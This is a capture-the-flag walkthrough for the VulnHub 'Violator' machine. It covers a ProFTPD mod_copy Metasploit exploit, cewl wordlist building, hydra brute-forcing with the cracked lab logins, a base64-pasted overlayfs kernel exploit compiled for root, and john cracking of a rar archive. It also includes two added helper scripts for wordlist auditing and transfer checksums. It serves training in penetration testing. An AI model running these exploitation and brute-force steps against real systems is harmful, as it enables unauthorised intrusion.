01. Target introduction
Description
Welcome to another boot2root / CTF; this one is called Violator. The VM is set to grab a DHCP lease on boot. As with my previous VMs, there is a theme, and you will need to snag the flag in order to complete the challenge.
A word of warning: The VM has a small HDD so you can brute force, but please set the disk to non persistent so you can always revert.
Some hints for you:
- Vince Clarke can help you with the Fast Fashion.
- The challenge isn't over with root. The flag is something special.
- I have put a few trolls in, but only to sport with you.
SHA1SUM: 47F68241E95E189126E94A38CB4AD461DD58EE88 violator.ova
Many thanks to BenR and GKNSB for testing this CTF.
Special thanks and shout-outs go to BenR, Rasta_Mouse and g0tmi1k for helping me to learn a lot creating these challenges.
Download: https://www.vulnhub.com/entry/violator-1,153/
02. Information gathering
Host discovery
Port scan
Directory scan
The directory scan did not turn up anything either.
Sensitive information
There are three things worth looking at here: a title, a website, and an image.
The image contains nothing useful.
The title, however, is worth trying.
Here we find the vulnerability is still usable.
https://en.wikipedia.org/wiki/Violator_(album) From experience, this is probably where to collect material for a wordlist.
03. Gaining access
Use the msf proftpd_modcopy_exec module to get a shell
use exploit/unix/ftp/proftpd_modcopy_exec
python3 -c 'import pty;pty.spawn("/bin/bash")'
Besides root, there are four more accounts that can log in.
Use cewl to crawl the site for a wordlist; after stripping the spaces the result is as follows:
cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt --proxy_host 34.66.5.144 --proxy_port 8888
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bludress
clean
cangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
Next, hydra can be used to brute-force the logins.
[21][ftp] host: 192.168.43.112 login: aw password: sweetestperfection
[21][ftp] host: 192.168.43.112 login: af password: enjoythesilence
[21][ftp] host: 192.168.43.112 login: mg password: bluedress
[21][ftp] host: 192.168.43.112 login: dg password: policyoftruth
After testing, all four accounts can log in.
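Building the wordlist and checking which accounts fall to it are the two halves of the step above. The following shell script is an added example, not code from the original post: it normalises cewl phrases the way the post's list was produced (lowercase, spaces removed, duplicates dropped) and then audits a constructed `user:salt:sha256hex` password store against that list, which is the check a defender would run to find theme-derived passwords before anyone else does. The hash scheme, the record format, the function names and the sample phrases are all assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: turn raw cewl output
# into the compact wordlist the post shows (spaces stripped, lowercased) and
# then check a set of stored account passwords against it, the check a
# defender runs to find passwords derived from a public theme. The
# "user:salt:sha256hex" record format and all sample data are constructed
# for this demonstration.

# Read phrases on stdin (one per line, as cewl prints them) and write
# candidates on stdout: lowercase, a-z0-9 only, at least 4 characters,
# duplicates removed while keeping first-seen order.
normalize_wordlist() {
    tr '[:upper:]' '[:lower:]' \
      | tr -cd 'a-z0-9\n' \
      | awk 'length($0) >= 4 && !seen[$0]++'
}

# Constructed toy hash: sha256(salt || password), hex. Real password stores
# use crypt(3)/bcrypt/argon2; the audit logic below is the same either way.
hash_password() {
    printf '%s%s' "$1" "$2" | sha256sum | cut -d' ' -f1
}

# Build one "user:salt:sha256hex" record for the sample store.
make_record() {
    printf '%s:%s:%s\n' "$1" "$2" "$(hash_password "$2" "$3")"
}

# $1 = file of user:salt:sha256hex records, $2 = wordlist file.
# Prints each user whose password is in the wordlist (first hit wins).
audit_passwords() {
    while IFS=: read -r user salt digest; do
        while read -r cand; do
            if [ "$(hash_password "$salt" "$cand")" = "$digest" ]; then
                echo "$user"
                break
            fi
        done < "$2"
    done < "$1"
}

# Stand-alone demo with constructed data: prints the users whose password
# came straight off the album-style phrase list.
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' "World in My Eyes" "Sweetest Perfection" "Policy of Truth" \
        "Halo" "world in my eyes" "DM" > "$tmp/raw.txt"
    normalize_wordlist < "$tmp/raw.txt" > "$tmp/wordlist.txt"
    {
        make_record aw  s1 sweetestperfection
        make_record dg  s2 policyoftruth
        make_record ops s3 'Tr0ub4dor&3-not-on-the-list'
    } > "$tmp/store.txt"
    audit_passwords "$tmp/store.txt" "$tmp/wordlist.txt"
    rm -rf "$tmp"
}

demo
```

Run it as `sh script.sh`; with the constructed data it prints `aw` and `dg`, the two accounts whose passwords are plain phrases from the list, and stays silent about `ops`. Pipe a real cewl output file into `normalize_wordlist` to get the same kind of list the post feeds to hydra and john.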
04. Privilege escalation
Here we escalate straight through a kernel exploit; the sudo rights of the dg account would also work for escalation.
There is no wget or curl...
So base64-encode the exploit locally, then decode it when writing it onto the server.
echo LyoKanVzdCBhbm90aGVyIG92ZXJsYXlmcyBleHBsb2l0LCB3b3JrcyBvbiBrZXJuZWxzIGJlZm9y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" | base64 -d > ex.c
chmod +x ex.c
gcc ex.c -o ex
./ex
Privilege escalation succeeded.
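The base64 transfer above works, but a long blob pasted through a pty can be silently truncated or mangled, and a broken `ex.c` then fails at compile time with no hint of why. The following shell functions are an added example, not code from the original post; they wrap the same `base64 -d` technique with a sha256 check on both ends so that a damaged paste is rejected instead of compiled. The `pack_for_paste`/`unpack_and_verify` names and the sample file are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the post moves the
# exploit source to the target by pasting a base64 blob into "base64 -d"
# because the box has no wget or curl. A blob pasted through a pty can be
# truncated or mangled, so this carries a sha256 along with the blob and
# rejects a file that does not match. File names are constructed.

# Sender side: print one line, "<sha256> <base64 without line breaks>",
# which is what gets pasted on the other end.
pack_for_paste() {
    printf '%s %s\n' "$(sha256sum "$1" | cut -d' ' -f1)" \
                     "$(base64 "$1" | tr -d '\n')"
}

# Receiver side: $1 = the packed line, $2 = destination path.
# Returns 1 and leaves no file behind if decoding or the checksum fails.
unpack_and_verify() {
    expected=${1%% *}
    blob=${1#* }
    if ! printf '%s' "$blob" | base64 -d > "$2" 2>/dev/null; then
        echo "base64 decode failed for $2" >&2
        rm -f "$2"
        return 1
    fi
    actual=$(sha256sum "$2" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $2: expected $expected got $actual" >&2
        rm -f "$2"
        return 1
    fi
    return 0
}

# Stand-alone demo: round-trip a small constructed source file, then show
# that a truncated paste (last four characters lost) is rejected.
demo() {
    tmp=$(mktemp -d)
    printf 'int main(void) { return 0; }\n' > "$tmp/ex.c"
    packed=$(pack_for_paste "$tmp/ex.c")
    unpack_and_verify "$packed" "$tmp/copy.c" && echo "intact copy verified"
    unpack_and_verify "${packed%????}" "$tmp/bad.c" || echo "truncated paste rejected"
    rm -rf "$tmp"
}

demo
```

On the sending side, `pack_for_paste ex.c` prints the line to paste; on the target, `unpack_and_verify '<pasted line>' ex.c` writes the file only if the checksum matches, so `gcc ex.c -o ex` runs on exactly the bytes that were sent.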
Under root we find a rar file, but its password has to be brute-forced.
Next we use rar2john and john to crack it; the wordlist is the password list produced by cewl.
1. Use rar2john to output the hash of the rar file
2. Use john to crack the rar file
3. View the cracked password
┌──(root㉿kali)-[~/下载]
└─# rar2john crocs.rar > password.hashes
! file name: artwork.jpg
┌──(root㉿kali)-[~/下载]
└─# john --wordlist=/root/violator.txt --rules password.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (rar, RAR3 [SHA1 256/256 AVX2 8x AES])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
World in My Eyes (crocs.rar)
1g 0:00:00:02 DONE (2023-04-13 09:45) 0.3968g/s 165.0p/s 165.0c/s 165.0C/s worldinmyeyes..suoregnaD
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The cracked password is shown below:
After extracting it we get the image below; a password is hidden in the image by steganography, but that password was not recovered here.
End
Originally published on the WeChat official account 贝雷帽SEC: NO.6 Violator range